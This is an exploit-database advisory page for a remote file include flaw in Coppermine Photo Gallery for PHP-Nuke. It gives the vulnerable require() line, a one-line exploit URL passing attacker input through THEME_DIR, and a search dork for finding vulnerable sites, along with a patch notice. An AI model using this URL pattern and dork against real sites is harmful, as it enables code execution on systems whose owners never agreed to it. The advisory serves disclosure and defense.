Coppermine Photo Gallery v1.2.2b for PHPNUKE (THEME_DIR) Remote File Include Vulnerability

vendor:

Coppermine Photo Gallery

by:

Dr Max Virus

N/A

CVSS

N/A

Remote File Include

CWE

Product Name: Coppermine Photo Gallery

Affected Version From: 1.0 RC3

Affected Version To: 1.2.2 b

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

Unknown

Coppermine Photo Gallery v1.2.2b for PHPNUKE (THEME_DIR) Remote File Include Vulnerability

A vulnerability exists in Coppermine Photo Gallery v1.2.2b for PHPNUKE, which allows a remote attacker to include a file from a remote location. This is due to the application not properly sanitizing user-supplied input to the 'THEME_DIR' parameter in the 'themes.php' script. An attacker can exploit this vulnerability to include arbitrary files from remote locations, which can lead to the execution of arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Coppermine Photo Gallery.

Source

Exploit-DB raw data:

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Coppermine Photo Gallery v1.2.2b for PHPNUKE (THEME_DIR) Remote File Include
Vulnerability
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Level:Dangerous
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Affected Versions:
1.0 RC3
1.1 beta 2
1.1 .0
1.2
1.2.1
1.2.2 b
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Code in: themes.php
Vul code:Vul code:require($THEME_DIR."/user_list_info_box.inc");
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit
victim.com/modules/coppermine/themes/default/theme.php?THEME_DIR=evill code
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
dork: Powered By Coppermine Photo Gallery v1.2.2b /Powered By Coppermine
Photo Gallery v1.2.1
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Greetz:str0ke-Thehacker-AsianEagle-Nukedx-NETTOXIC-All Ayyildiz Team
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2006-09-15]